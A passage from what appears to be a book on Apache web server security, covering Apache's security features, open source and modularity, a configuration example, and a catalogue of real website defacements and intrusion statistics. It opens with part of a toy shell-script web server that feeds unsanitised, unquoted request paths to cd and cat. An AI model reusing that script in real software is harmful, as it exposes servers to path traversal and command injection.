      print_error 404 "No such file or directory"
   fi

   # A request that names a directory gets the default index file
   if [ -z "${URL##*/}" ]; then
      URL=${URL}${DEFINDEX}
   fi

   DIR="`dirname $URL`"
   if [ ! -d ${DOCROOT}/${DIR} ]; then
      log ${PEER} - 404 0
      print_error 404 "Directory not found"
   else
      cd ${DOCROOT}/${DIR}
      NURL="`pwd`/`basename ${URL}`"
      URL=${NURL}
   fi

   if [ ! -f ${URL} ]; then
      log ${PEER} - 404 0
      print_error 404 "Document not found"
   fi

   print_header
   guess_content_type ${URL}
   LEN="`ls -l ${URL} | tr -s ' ' | cut -d' ' -f 5`"
   echo -e "Content-length: $LEN\r\n\r"
   log ${PEER} - 200 ${LEN}
   cat ${URL}
   sleep 3
}

# Read the request line from stdin (the socket) and dispatch on the method
read_request() {
   local DIRT
   local COMMAND

   read REQUEST
   read DIRT

   REQ_DATE="`date +"%d/%b/%Y:%H:%M:%S %z"`"
   REQUEST="`echo ${REQUEST} | tr -s [:blank:]`"

   COMMAND="`echo ${REQUEST} | cut -d ' ' -f 1`"
   URL="`echo ${REQUEST} | cut -d ' ' -f 2`"
   PROTOCOL="`echo ${REQUEST} | cut -d ' ' -f 3`"

   case $COMMAND in
      HEAD) print_error 501 "Not implemented (yet)" ;;
      GET) do_get ;;
      *) print_error 501 "Not Implemented" ;;
   esac
}

#
# It was supposed to be clean - without any
# non-standard utilities but I want some
# logging where the connections come from, so
# I use just this one utility to get the peer address
#
PEER="`getpeername | cut -d ' ' -f 1`"

read_request

exit 0
Such barebones Web servers—written in many languages—conform, in varying degrees, to the HTTP standard. Some exotic ones include the following:


• Apprentice by Dmitry Ovsyanko, written in Perl, is available at http://www.halyava.ru/do/apprentice.htm. 


• AWKhttpd by Valentin Hilbig, written in awk, is available at http://awk.geht.net:81/README.html. 


• PS-HTTPD by Anders Karlsson, written in PostScript (yes, PostScript), is available at http://www.pugo.org:8080/. 


• SED-HTTPD, by Matthew Parry, written in sed, is available at http://awk.geht.net:81/contrib/sedhttpd/sedhttpd0.2.txt.


These eclectic tools seldom offer advanced security features, but instead emulate, 
embody, or advance the original concept of a Web server proper: They wait for and 
satisfy remote client requests. 


The degree of security your Web server offers, therefore, depends largely on its development team’s efforts. Along these lines, you’re in luck. The Apache team has proven experience in network security, and has skillfully applied that experience to produce an excellent product. Today, Apache Web Server has more security facilities pound-for-pound than any other server in its class.


NOTE 


Although Apache’s development team is highly skilled, this doesn’t mean that Apache is (or ever was) impenetrable. As evidenced by entries in Appendix B, “Apache Security Advisories and Bugs,” Apache, like any network application, has a significant security history.





Apache Security Facilities 


Apache’s security facilities account not merely for HTTP’s inherent insecurity, but 
even for some of the insecurities in operating systems on which Apache runs. These 
facilities—either natively embedded or obtainable through third-party Apache 
modules—deal with the following: 


• Accounting and logging—Web servers without security support lack a fundamental characteristic: They cannot preserve evidence of an attack. To counter this, Apache provides extensive logging facilities that enable you to customize how and what the server logs. 


• Anonymous user support—Apache supports anonymous users, a useful function if you designate portions of your site as public-access areas. Rather than create username and password pairs for every Jane Doe that happens by, you can simply designate an “Anonymous” login that all visitors can use. 


• CGI security—HTTP runs by default on port 80, a privileged port that only root can bind. In antiquity, this posed a security issue. CGI programs (search engines, for example) could inherit all-encompassing permissions if attackers could crack them. To address this, Apache ships with CGI security features that enable you to specify under what user ID CGI programs run, and what permissions they inherit. 


• Denial-of-service attacks—Brutish, uncomplicated denial-of-service attacks are actions that any idiot can undertake. One such attack is elementary: Try to consume enough memory, namespace, or bandwidth to bring the server down. To handle this issue, Apache offers facilities that enable you to control how large HTTP client requests can be, and even how much bandwidth a particular user or client address can eat. 


• Encrypted sessions—Bare HTTP doesn’t armor client/server transmissions against electronic eavesdropping. Therefore, well-placed spying tools can capture sensitive data that users pass to your server (and vice versa). To address this, Apache supports Secure Sockets Layer (SSL) with a host of cipher suites. These guarantee that even if attackers do capture session transmissions, they’ll reap little for their efforts. Well-encrypted data is exceedingly difficult to unravel. 


• File and directory access control—Apache provides means to control what files, directories, and resources remote clients can obtain. Apache’s control here is incisive, too, enabling you to protect directories and subdirectories in a nested fashion (applying different controls at different levels of your hierarchical directory tree structure). 


• HTTP methods—Various HTTP methods permit remote clients to access, manipulate, or alter server-owned data. This has security implications. To account for this, Apache offers granular control of the HTTP request methods CONNECT, COPY, DELETE, GET, HEAD, LINK, LOCK, MKCOL, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, PUT, TRACE, UNLINK, and UNLOCK. 


• Network access control—Web services are publicly accessible. As such, unless you take steps to ensure otherwise, anyone from anywhere can engage your server and issue document requests. To account for this, Apache offers several network access control features. These enable you to specify Allow/Deny rules that restrict who, what addresses, what hosts, and what networks can access your server’s directory structure. 


• Proxy control—Proxy-based systems and proxy chains can often reveal sensitive data, such as your server’s configuration. This is highly undesirable, because it allows attackers to gather valuable intelligence. To account for this, Apache ships with features to control what data clients can glean from your proxies, or a proxy chain to which your server belongs. 


• User authentication—Apache provides facilities to handle user authentication, and enables you to allow access to one user and deny access to another. Furthermore, Apache offers not merely basic or database-driven authentication; it also supports digest authentication. 


• User tracking—HTTP is a stateless protocol, and thus cannot provide user session management. This bars you from offering customized services to users, or the ability to track their activity. To account for this, Apache provides facilities to track users through cookies.


In sum, Apache offers extensive security facilities, and throughout the book we'll 
cover each in turn. Before we start, however, I’ll address one Apache security feature 
that overshadows the rest. 


Apache Web Server, Security, and Open Source 


Apache Web Server is an open source application. That is, although you can download ready-to-run Apache binary distributions (the kind that often ship on book CD-ROMs) you can also obtain Apache’s source code. This has important security advantages.


If you’ve used the Internet for any length of time—and you clearly have, or you wouldn’t have purchased, borrowed, or stolen this book—you’ve heard the argument. Some folks contend that open source lends to greater security while others disagree. The dispute is nearly as old and acrimonious as classical arguments in the operating system wars.


However, the open source advocacy argument arises not from passion or bias, but common sense. Ask yourself this: how many programs do you use daily? Of these, how many are open source? Finally, how do you know that the remaining applications you use (for which you have no source) don’t have governmental or corporate backdoors? The answer: you don’t.


At first glance, these statements seem paranoid. However, here’s a fact: Business and 
government are inherently non-altruistic fields. 


Corporations, in particular, crave data. They want to know everything about you—what sites you surf, what operating system you use, your demographics, your spending habits, and whether you’ve pirated their software. In short, they want to watch your every move online, and whenever possible, they want to access your system remotely.


NOTE 


Countless examples of such intrusive and surreptitious tracking exist, most recently the cases of LimeWire, Grokster, and KaZaA. (See this link for more information: http://www.salon.com/tech/feature/2001/08/02/parasite_capital/print.html.)
True, software vendors package their intrusive curiosity in a friendly box. Some insist, for example, that your “computing experience” will be ever-so-much-better if you’d only allow them to repair your system from remote locations. But you wouldn’t allow these jokers into your home while you’re at work, would you? No. So why give them a key to your computer?


Open source programs like Apache offer superior security because you can see—with 
your own eyes—their innermost workings. Indeed, you can examine every last line 
of code and determine whether backdoors exist. Moreover, you can verify just how 
well Apache’s developers did their jobs. 


Casual users argue that these points are irrelevant because to realize significant gains 
from open source, you must first understand source code. Is this true? Partly. 
However, as a Webmaster, you’re not a casual user, and can’t afford to be. Chances 
are, shortly after you established your site you began storing not only your data, but 
also data owned by others. As such, you now have certain responsibilities. One is to 
ensure that your Web site doesn’t get cracked. 


If I’ve unnerved you with these comments, breathe easy. It’s not necessary that you 
become a master C programmer to run an Apache site, and that’s the real beauty of 
open source. Because Apache’s source is open, master C programmers worldwide can 
examine its code daily and pick through loops, buffers, and other constructs, looking 
for holes. Thus, even though you may not today holistically understand Apache’s 
code, you still gain security benefits. Other folks who are master C programmers are 
doing your research for you, even as you read this. 


However, open source advantages don’t end there. Programmers worldwide don’t 
merely audit and discuss Apache’s code; they also endeavor to extend Apache’s func- 
tionality. 


Apache Extensibility 


Ask ten different programmers to define the term extensibility and you might receive varied answers. For our purposes, however, extensibility is merely this: the quality of, and the degree to which, a program can adopt or incorporate features or characteristics at some future date that it didn’t previously have.


Some programs or commands aren’t extensible and needn’t be. Consider, for example, directory navigation commands such as cd and chdir. These commands are as old as operating systems and perform a limited task: They enable you to navigate your file system. To demand that their developers make these tools extensible is unreasonable. Such tools fulfill their intended purpose, which has a narrow scope.
However, applications that interface or collaborate with other tools, or protocols that are likely to evolve technologically over time should be extensible, for several reasons:


• Competition—Competition in the computer industry is fierce. Applications that are extensible survive and prosper, while applications that aren’t, don’t (or become marginalized). 


• Societal benefit—A non-extensible application is, for average users, a dead-end street. Users today crave new features and a high degree of customization. Extensible applications invite such users to exercise skill and imagination to create new and useful tools that benefit the Internet community at large. 


• Stability—Enterprises often base their commerce on a specific application set, and invest considerable money in the process. These enterprises can suffer substantial losses if their system suddenly becomes obsolete in the face of new technology.


Apache has long been extensible, and as such has kept astride of most Web-oriented 
technological advances (for example, XML). It thus satisfies competitive, societal, 
and stability issues and provides an ever-increasing array of security facilities. Apache 
owes this flexibility to its inherently modular design. Let’s briefly review that, too. 


Apache’s Modular Design and the Apache API 


Modular design is yet another term that, depending on who you ask, has different meanings. For our purposes, however, the term denotes characteristics of a system that can include or incorporate separate or disparate parts into its overall construction, like building blocks. Such separate or distinct parts are modules.


To grasp this, think of your favorite word processor and substitute the word modules for templates. Microsoft Word and WordPerfect both offer many templates, including those that generate legal pleadings. Legal pleadings are notoriously complicated documents that bear many distinct and curious characteristics that courts require. Word or WordPerfect templates “plug into” their parent applications and seamlessly incorporate legal pleading formatting and functionality into those parent applications that wasn’t previously available.


Apache’s modular design affects security in several ways: 


• Apache’s source and Application Programming Interface (API) are both open to public examination. This means that the Apache team provided developers worldwide with tools and knowledge to develop Apache modules at will. As a result, programmers familiar with emerging and exotic encryption algorithms can, at any time, develop Apache modules that deploy such encryption. Therefore, Apache’s future security facilities and options are confined only by the imaginations of independent Apache developers. 


• Apache’s modular design enables Webmasters to discriminately pick and choose which security features they want or need. Because modules are independent entities—entities that Apache is neither tied to nor needs to operate effectively—Webmasters needn’t accept unwanted, irrelevant, or extraneous modular components. Instead, they can include only those modules that provide services critical to their enterprise. 


• Apache’s modular design offers rapid, decentralized deployment and response. For example, suppose that an Apache security module you’re using proves vulnerable to attack. You can instantly (or very near instantly) disable that module’s support. And, typically, within a week or so, that module’s author will issue a fix or a patched version. Conversely, when new modules emerge that offer desirable services, you can plug them in with minimal effort. To understand how valuable this is, contrast this against Apache’s strongest competitor, Microsoft’s IIS. IIS is a centralized application, maintained by a single entity. It therefore not only evolves on a slower development curve, but also offers comparatively limited flexibility. And because new attack methodologies (and new security technologies) emerge daily, flexibility, rapid deployment, and turnaround are all essential issues.
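What "disable that module's support" amounts to in practice, and how the rest of the configuration survives the switch, is shown by the httpd.conf fragment below. It is an added example, not code from this book or from the Apache project; it assumes Apache 2.0 built with DSO support, the module paths are placeholders, and mod_thirdparty.so stands for a hypothetical third-party module.

```apache
# Added example (not from the book): the module switch in httpd.conf.
# Assumes Apache 2.0 with DSO support; paths are placeholders and
# mod_thirdparty.so is a hypothetical third-party module.

# Load only what this site uses; each line is one facility that can be
# taken away again
LoadModule access_module modules/mod_access.so
LoadModule auth_module modules/mod_auth.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule ssl_module modules/mod_ssl.so

# A third-party module whose author has just reported a hole: comment out
# its one LoadModule line and restart, and its code is no longer in the
# process (a module compiled in statically needs a rebuild instead)
#LoadModule thirdparty_module modules/mod_thirdparty.so

# Directives that belong to a module are wrapped in <IfModule>, so the
# server still starts when that module is absent...
<IfModule mod_ssl.c>
    Listen 443
    SSLRandomSeed startup builtin
</IfModule>

# ...and the resources that depended on it fail closed rather than being
# served without their protection
<IfModule !mod_ssl.c>
    <Directory /var/www/secure>
        Order deny,allow
        Deny from all
    </Directory>
</IfModule>
```

Check the result with apachectl configtest before restarting, and use httpd -l to list the modules compiled in statically: those do not appear as LoadModule lines and cannot be removed by editing the configuration.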


For all these reasons, Apache is an excellent choice. However, it’s not all wine and 
roses. Indeed, the basic arguments against open source tools like Apache still apply. 
To reap all these wonderful benefits, you must first adopt a more advanced mindset 
than that maintained by casual users. 


Casual users conceptualize software tools as programs, static entities that perform 
specific tasks with limited scope. Such users rarely conceptualize such tools as services 
that interact holistically with other applications and their operating systems at large. 
Apache Web Server is such a service, and it can and often does interface with other 
systems and services. This naturally has security implications. 


Furthermore, you'll need to cultivate an outlook wherein security is an ongoing 
process, not an end, and within that framework, things like access control are 
models, not conditions. Before you place your Web server on the freeway—where 
anyone can access it—you’ll need to carefully consider security and access control in 
the larger sense, as concepts and policies with wide implications. 


Finally, you’ll need to cultivate survival skills and a high degree of independence. True, plenty of Web sites offer Apache security primers, and by now you probably have Ben Laurie’s book and several others on Apache administration. These will certainly help. But the bottom line is this: The Apache development team is a busy bunch, and they seldom offer extensive technical support to budding Apache administrators. Occasionally, you’ll encounter security issues that arise from your specific configuration, and as such you’ll need to exercise ingenuity and creativity in solving them.
For these reasons, I wrote this book specifically for folks that are new to Apache. In it, I tried to include arcane and recondite situations that you’ll encounter in real life. By running through these—and demonstrating methodical approaches to solving them—I hope to arm you with not merely a dead-end reference, but also a tool that trains you to know when, how, and where to look for answers, whether in Apache’s configuration, your underlying system, or the Internet itself.


Having described Apache security facilities, its advantages, and its disadvantages, I now offer just a few more words of caution. Apache has excellent security capabilities, to be sure, but these relate solely to your Web services. Many conditions and situations arise for which Apache has no cure.


Things Apache Can't Defend Against 


As discussed previously, in context with Web services, Apache addresses a staggering 
number of security issues, including accounting, logging, denial-of-service, HTTP 
methods, electronic eavesdropping, proxies, user authentication, and user tracking. 
Indeed, if you serve only static documents from your Apache server, these measures 
alone are nearly enough to chase off all but the most determined crackers. 


However, precious few Webmasters confine their Web-based services to static document storage and retrieval—and why should they? Apache, when coupled with other applications, can do extraordinary things, such as serve streamed and multimedia content, database output, XML, CGI, and a dozen other things, including WAP/WML gateway-borne services to handheld devices and cellular telephones. You doubtless have similar plans, and it’s important to recognize that the further you venture from simple document storage and retrieval, the more danger you potentially encounter.


Apache cannot account for many variables in environments that support multiple 
services. These include the following: 


• Database issues—Apache may securely interface with this or that database, and that’s fine. However, if your preferred database has security issues or vulnerabilities that have nothing to do with Apache, Apache cannot help. To learn more about these issues, see Chapter 5, “Apache, Databases, and Security.” 


• Common Gateway Interface—You’ll doubtless include at least some CGI functionality on your site. As I related earlier, Apache accounts for CGI security issues—at least those that revolve around permissions. This is great news, but by no means the end of the story. Bad CGI is bad CGI, and if you or your developers fail to observe CGI coding security practices, Apache won’t save the day. To learn more, see Chapter 12, “Hacking Secure Code: Apache at Server-Side.”




• Environmental issues—Apache’s code assumes that you’ve configured your underlying system properly and securely. If you haven’t, Apache’s raw power can then turn against you and offer crackers innumerable possibilities. To learn more, see Chapter 4, “Environmental Hazards: Apache and Your Operating System.” 


• Inside jobs—More than 60% of all intrusions today stem from insiders, disgruntled employees, or other individuals to whom you entrust administrative privileges. Therefore, observing standard security policies (such as locking out fired developers) is paramount. Learn more in Chapter 2, “The Risks: Cracking Apache.” 


• Third-party tools—Third-party modules—security related or otherwise—can sometimes harbor hidden or latent holes. Naturally, you’ll want to enhance your Apache server’s functionality, but in doing so, choose modules wisely. If you compile in, bind, or load a flawed module to Apache, Apache core and security facilities won’t save the day. Learn more in Appendix B, “Apache Security Advisories and Bugs.” 


• Personal diligence—Crackers are busy folks, and find holes in applications every day. Therefore, you must constantly keep up to date on the security status of your underlying operating system, Apache, and any third-party modules you load. Security lists and advisories are invaluable resources in this regard, providing that you read them. Learn more in Appendix C, “Apache Security Resources.” 


• Network attacks—Apache cannot save your system from attacks that exploit network hardware or infrastructures beyond its control.


This book will cover each of these issues in detail—and provide examples of how 
these external forces can undermine Apache’s security model. 


Summary 


Apache has numerous and powerful security features. These features, when acting in concert with your operating system’s native security features, provide top-notch protection against crackers. In subsequent chapters, we’ll go through Apache’s security facilities one by one. First, however, we’ll examine the aforementioned factors that Apache cannot control, factors and issues that you must address before you debut your Apache Web Server host on a public or private network. Let’s get busy.
2 
The Risks: Cracking Apache 


IN THIS CHAPTER 


• Inherent Risks of Running a Web Server 


• Sobering Statistics to Consider 


• How Security Disasters Develop 


This chapter covers the risks you’ll face as an Apache administrator.


Inherent Risks of Running a Web Server 


Running a Web server—or any Internet information server—carries inherent risks. The scenarios run in escalating severity:


• Intruders gain access and nothing more (access being simple, unauthorized entry) 


• Intruders do not gain access, but instead deploy malicious code that causes your server or network to fail, hang, reboot, or otherwise manifest an inoperable condition 


• Intruders gain unauthorized access and destroy, corrupt, or otherwise alter data or deny access to privileged users 


• Intruders gain access and seize control of a portion of your system (or even your entire network)


Ask ten administrators what your chances are, and you'll get varied responses.
Most Webmasters imagine that their Web hosts are secure. Some will argue that they
use OpenBSD and are therefore immune to attack, others will swear by their
firewalls, and still others will contend that their homegrown solutions are
sufficient to ward off attack.

These assertions all seem hopeful, but don’t rely on them. In the real world, the
odds are against you.


Sobering Statistics to Consider 


Hard statistics on security breaches are sobering. A good resource is the Computer
Security Institute’s Computer Crime and Security Survey, an annual publication, which
you can obtain online at CSI’s site: http://www.gocsi.com/prelea/000321.html.


As explained by CSI: 


The Computer Crime and Security Survey is conducted by CSI with the participation of the
San Francisco Federal Bureau of Investigation’s (FBI) Computer Intrusion Squad. The aim of
this effort is to raise the level of security awareness, as well as help determine the scope of
computer crime in the United States. Based on responses from 538 computer security
practitioners in U.S. corporations, government agencies, financial institutions, medical
institutions and universities, the findings of the “2001 Computer Crime and Security Survey”
confirm that the threat from computer crime and other information security breaches
continues unabated and that the financial toll is mounting.


The 2001 CCSS shows that 85% of respondents experienced break-ins. Of those, 186 
participants willing to disclose their resulting financial losses reported an aggregate 
sum of more than $370,000,000. This amount exceeded Y2K losses by over 
$100,000,000. Seventy percent of all CCSS respondents reported intrusions over their 
Internet-based connections, compared to only 59% in 2000. Finally, 97% reported 
that they maintain Web sites. Clearly, establishing and maintaining a Web server 
exposes you to considerable risk. 


NOTE 


CCSS reports only known security breaches or those that victims report. Many folks, however, 
do not report their security incidents. The figures are therefore likely much higher. 





Worse, trends suggest that even security-oriented sites—sites you’d expect to be
secure—suffer intrusions regularly. One good example is Secure Root, a high profile,
well-respected security resource center. Secure Root (http://secureroot.com/) is an
all-purpose security site that offers documentation on advisories, attacks, denial-of-
service attacks, cracking, encryption, and many other security-related issues.


On Thursday, December 27, 2001, attackers with the group r@0t-access crew
defaced Secure Root’s site. This shocked the security community, because Secure
Root’s owners are security experts. However, that’s not the story’s end—not by a long
shot. Before the attackers left, they posted an ominous message on the home page:


Admin: Nothing was bothered...deleted etc...except the logs of course...we have had access
for over a half a year now giving little hints/tips that u were penetrated...of course nothing
was done, hopefully this deface has woken you up. btw- your site was cool until you stopped
updating it.


If the attackers’ claims have merit, Secure Root operated its business for six months 
without detecting the intrusion. How could this happen? 


NOTE 


To see a mirror of Secure Root’s cracked page, go to
http://www.safemode.org/mirror/2001/12/26/www.secureroot.com/.





Sadly, Secure Root is not alone. Consider the case of TASC, a Northrop Grumman
Corporation subsidiary. TASC proudly reports on its home page
(http://www.tasc.com/areas/security/) its excellent security reputation:


For decades, TASC has been a leading provider of Enterprise Security solutions to national
security clients, having protected some of the most sensitive information and programs in the
U.S. government.


These statements seem encouraging. Look at its client list:

• Air Force Space Command
• FAA
• GSA SAFEGUARD
• Joint Task Force for Computer Network Defense (JTF-CND)
• The Air Force Information Warfare Center (AFIWC)
• The Air Force Space Warfare Center (SWC)
• The Air Force’s Air Intelligence Agency (AIA)
• The Army’s Land Information Warfare Activity (LIWA)
• The Defense Information Systems Agency (DISA)
• The Department of Transportation
• The Joint Chiefs of Staff
• The National Reconnaissance Office (NRO)
• The National Security Agency (NSA)
• The U.S. Capitol Police
• The Volpe Center, Department of Transportation
• U.S. Space Command


One could hardly dream up a more prestigious list. Every organization listed controls 
vital national security information of significant military, strategic, or intelligence 
value. How, then, did TASC suffer a critical attack on Wednesday, December 26, 
2001? That morning, a cracker calling himself Crookies seized control of TASC’s 
system to post a birthday greeting for a friend, EvilByte. 


These lessons drive home an important point: No one is immune. Failure to be
diligent can lead to security disasters.


A few other cases to consider:


• Between December 19 and 22, 2001, attackers seized control of four sites run by
U.S. Courts (U.S. Bankruptcy Court, Middle District of Georgia; U.S. District
Court, Northern District of New York; U.S. District Court, District of Vermont;
and U.S. Bankruptcy Court, PA, Eastern District). The attacker defaced the
systems out of boredom. Access the defaced sites at
http://www.attrition.org/security/commentary/uscourts1.html.


• On December 15, 2001, the MTV Networks Affiliate Sales and Marketing Web
site fell to “The-Rev of fuxOr Inc.” In the message he left, The Reverend
criticized MTV (which maintains the site) for commercialization of the music video
industry. He wrote, “MTV started out as a way to express creativity throughout
the world thru (sic) the magic of music. But today the magic is gone and what
were (sic) left with is corporations seeking the lowest common denominator.”
See the defaced page at
http://www.safemode.org/mirror/2001/12/08/www.virginrecords.com/mirror.html.


But those cases were just a glimpse; let’s expand our view. Table 2.1 lists several other 
noteworthy cases. 


TABLE 2.1 Noteworthy Cases of Web Servers Hacked or Cracked

Victim      Business and Circumstances

Bulgaria    This was a top-level domain for the nation Bulgaria (and several domains
            attached to it) that fell on January 31, June 14, July 6, August 26,
            September 3, September 4, September 23, October 21, and November 23,
            2000. In one case, the attacker waxed pragmatic about computer crime,
            warning that if you get caught...you get caught. See the defaced pages
            at http://www.attrition.org/mirror/attrition/bg.html.

Cuba        This was a top-level domain for the nation of Cuba (and several connected
            to it) that fell in February 2000. In this case, the attackers
            compromised 31 index pages in the .cu hierarchy, leaving the same
            message on each: “USA GET OUT HUMAN RIGHTS COMMISION!” [sic]

Ecuador     This was a top-level domain for the nation of Ecuador, which fell on
            June 16, July 14, and September 27, 2000. The attacker, Silver Lords,
            left an apologetic message chiding the system administrator to fix his
            security, and a lovely anime cell with an accompanying anime background.
            Attrition.org has the defaced version at
            http://www.attrition.org/mirror/attrition/2000/12/16/www.apmanta.gov.ec/.

Egypt       This was a top-level domain for the nation of Egypt that fell on
            March 12, April 22, and November 10, 2000. The number of pages and
            domains affected is too many to enumerate here. On some, attackers left
            poetry, on others, artwork. One attacker (LinuxLover) left stunning
            techno-art that fused beautiful women with high-end, 3D layering (and
            offensive messages about Egyptians and Israelis that we cannot print
            here).

Ghana       This was a top-level domain for the nation of Ghana that fell on
            August 14, 2000. Here, in one case, the attacker reported that the
            responsible application and protocol was rsh (discussed later in this
            chapter). How many administrators run rsh on Web servers nowadays? Not
            many—and certainly not the Webmaster at csir.org.gh (not anymore,
            anyway).

Guam        This was a top-level domain for the nation of Guam, which fell on
            September 10, October 8, October 27, November 18, and November 22, 2000.
            The attacker was disdainful and vitriolic, leaving various obscenities
            and advising the Web master, “No security waz [sic] Found Here.. [sic]
            Just Bugs and security Errors...if you nedd [sic] assistance for
            securing your system e-mail me.” (It’s my hope that the Webmaster did
            reply, and during that exchange, sent the attacker links to
            dictionary.com and the Chicago Manual of Style).

Iran        This was a top-level domain for the nation of Iran that fell on
            March 9, April 25, October 29, November 4, November 8, November 12,
            November 18, November 19, and November 20, 2000. Here, outraged Israeli
            supporters voiced their discontent by hacking 20 pages. On one, they
            left a background of 24 Israeli flags waving in the wind. Atop this,
            they advised, “THIS SITE HE’S ON 56Kbs MODEM? BUY ISDN OR SOMETHING!!!”

Lucent      Lucent Technologies’ United Kingdom division at http://www.lucent.co.uk/
            fell in November 2000.

McAfee      McAfee’s Brazilian division also fell in November 2000. See it at
            http://www.attrition.org/mirror/attrition/2000/11/29/www.mcafee.com.br/.

Microsoft   Microsoft’s Slovenian division was attacked on December 14, 2001. The
            attacker ridiculed Microsoft’s historical security stance using an old
            Microsoft policy quote popularized by L0pht: “Choose Windows. Choose
            the Millennium. Choose IIS. Choose SQL Server. Choose not to choose...”
            “That vulnerability is completely theoretical.” See the original at
            http://www.attrition.org/mirror/attrition/2000/12/14/www.microsoft.si/.

VISA        VISA International (this time, in Germany at http://www.visa.de) fell in
            November 2000, with the attacker warning to watch out before you buy
            online because “hackers are watching you.” See it at
            http://www.attrition.org/mirror/attrition/2000/11/09/www.visa.de/.





I know what you’re thinking. These cases were all isolated incidents, chiefly
overseas. For example, Microsoft got hacked only in Slovenia, and few Americans can
point to that nation on a map. The big boys at home are still and always will be
secure, right? Well, here’s a surprise: I’ve been giving you the slow boat to China.


Microsoft got hacked innumerable times. Here are just a few, choice spots you might
recognize or visit often:


• arulk.rte.microsoft.com—One of Microsoft’s prime RTE servers, hacked by
Prime Suspectz on June 21, 2001.

• events.microsoft.com—The Microsoft Events Server, hacked on November 7,
2000.

• explorer.msn.com—Hacked on July 19, 2001.

• feeds.mobile.msn.com—The site from which Microsoft issues feeds, hacked by
Prime Suspectz on June 21, 2001.

• msrconf.microsoft.com—Hacked on October 24, 1999.

• redsand.rte.microsoft.com—One of Microsoft’s main RTE servers, hacked on
June 21, 2001.

• streamer.microsoft.com—The site from which Microsoft does streaming,
hacked on May 7, 2001.

• windowsupdate.microsoft.com—The site from which users pull Windows
updates, hacked on July 19, 2001.


Finally, on the day I wrote this chapter (a Sunday, incidentally), I recorded all attacks
that occurred prior to 10:37 a.m. It was then that I inserted the information into
Table 2.2.


NOTE 


To obtain up-to-the-minute reports on hacks and defacements, go to Alldas at
http://www.alldas.org/.





Table 2.2 shows:

• The victims’ addresses
• The attackers’ handles
• The operating systems on each target


Remember—Table 2.2 summarizes just a few hours of activity—on a Sunday morning!
Many sites listed below were still in a defaced state as I wrote this (their
administrators hadn’t yet realized it).


TABLE 2.2 Early-Morning Attacks, January 27, 2002

Victim                      Hacker            Operating System
bumstead.byu.edu            null              Solaris
consultweb.com.br           haxOrs lab        Linux
e-puntcom.com               haxOrs lab        Unknown
falcon.globalweb.co.uk      Trippin Smurfs    Linux
kwn.com.tw                  Digital WrapperZ  FreeBSD
library.ajou.ac.kr          Digital WrapperZ  HP-UX
linux.ngi.it                ranmakun          Unknown
newark.de.us                xb0Ox             Windows
office.byesville.net        null              BSDI
recherche.mesfinances.fr    BHS               Linux
snark.starnet.fi            BHS               Linux
technicalredneck.com        haxOrs lab        Linux
www.aboutminsk.net          Perfect.Br        Linux
www.australianway.com.au    Perfect.Br        Windows
www.bcjcammeray.com.au      Perfect.Br        Windows
www.bfact.com               AIC               Windows
www.bigdaddys-world.com     haxOrs lab        OpenBSD
www.blueskyhost.com         HiddenLine        Unknown
www.canadogs.com            Crookies          Windows
www.cehcom.univali.br       haxOrs lab        Linux
www.cem-corp.co.jp          Crookies          Linux (Apache)
www.ciputra.com             MedanHacking      Windows
www.clanding.org            val Il            Unknown
www.comdesp.com.br          BHS               Linux
www.connect2one.com         $4t4n1c_SOuls     Windows
www.coronadotravel.com      Crookies          Windows
www.cyber-seniorsusa.com    BONZER^JB         Linux
www.das-parlament.de        haxOrs lab        Linux
www.dip.co.uk               Tyl3r_durden      Windows
www.disparoalacabeza.com    haxOrs lab        Linux
www.doctorheller.com        Perfect.Br        Linux
www.du.co.kr                DarkCode          Linux (Apache)
www.eaml.co.jp              TheFugitive       Windows
www.formetco.com            TeckLife          FreeBSD
www.hdavidkowal.com         xb0Ox             ?
www.hillary.com             ANJOS DO          Windows
www.immaginefabio.it        LOrd_ByrOn        Windows
www.inenco.net              haxOrs lab        Linux
www.joices.hu               Darksheep         Linux (Apache)
www.lead.org.pk             h2o               Windows
www.Lioninc.org             Tyl3r_durden      Unknown
www.lippoinvestments.com    HiddenLine        Windows
www.mef.gob.pe              nObodies          Solaris
www.mendiaketaherriak.com   EVIL ANGELICA     Windows
www.noclueserver.nl         Fluffy Bunny      FreeBSD
www.pixdraw.co.kr           haxOrs lab        Linux
www.placecn.com             haxOrs lab        Unknown
www.plastikero.com.br       haxOrs lab        Linux
www.question.fr             nerf              Unknown
www.revistaveamas.com       anjos             Unknown
www.rpairn.com              xb0Ox             Linux
www.sagu.edu                Crookies          Windows
www.sepultura.com           Web Pirates       Linux
www.southernhosting.com     HiddenLine        Linux
www.theheavyweights.com     Perfect.Br        Windows
www.thesa.co.kr             DarkCode          Linux
www.tozsdekukac.hu          Crookies          Linux (Apache)
www.tradertraffic.com       Perfect.Br        Linux





Between the time I first began formatting the data and when I finished (about ten 
minutes), eight more sites fell. 


Are you nervous yet? 


How Security Disasters Develop


As I related earlier, the scenarios you'll face are the following:

• Intruders gaining simple access
• Denial of service
• Defacement or total system seizure


Let’s run through the factors that invite these situations. 


Intruders Gaining Simple Access 


Simple unauthorized access can happen in several ways: 


• Insiders who once had authorized access (former employees or developers, for
example) return to haunt you.

• Your users make bad password choices on other networks that fall to hackers.
This leads to cross-network unauthorized access.

• Your underlying operating system has holes, and diligent hackers exploit it to
gain limited access.

• The tools you use in conjunction with Apache are flawed.


Research studies show that some 70% of serious intrusions come from insiders. I 
encounter such cases all the time: 


• In January 2002, a prominent online porn provider contacted me. A former
developer defected to another firm and took the porn provider’s client list with
him. He also took username/password databases and was using these, through
anonymous remailers, to solicit its clients. Adding insult to injury, he also
broke into my client’s servers.

• In 2001, I audited a system that offered bullion-backed credit/debit cards.
Developers who had since quit left behind backdoors to secure remote access
administrative sections through PHP, with SSL client certificates.

• In 2000, a defense contractor contacted me. Its skunk works division used a
centralized password server that housed 4,500 username/password pairs. Of
users connected to these, more than 800 were no longer with the firm, and of
these, 42 were still utilizing network resources without authorization—and
these folks build nuclear weapon components.


To guard against these situations, when you terminate a user, remove the account.
Also, preserve all files and directories associated with that user on backup media.
(You may later need these for evidence.) And, you’d benefit by installing monitoring
tools that record user activities.


Furthermore, in enterprise environments, try to isolate development boxes from 
production boxes. That is, have your developers do their work on test bed systems 
that mirror your production system’s setup. That way, developers never actually have 
access to your enterprise system. A simple code audit prior to moving their work 
over to the enterprise box can then determine whether malicious code exists therein. 


Users and System Security 

As a rule, you shouldn’t let many people access your Web host from the inside. For 
example, Web servers aren’t boxes that you’d normally put shell or Windows user 
accounts on. Rather, you should restrict these machines to Web services alone. That’s 
a given. 


However, you'll still have portions of your Web site that only authorized remote 
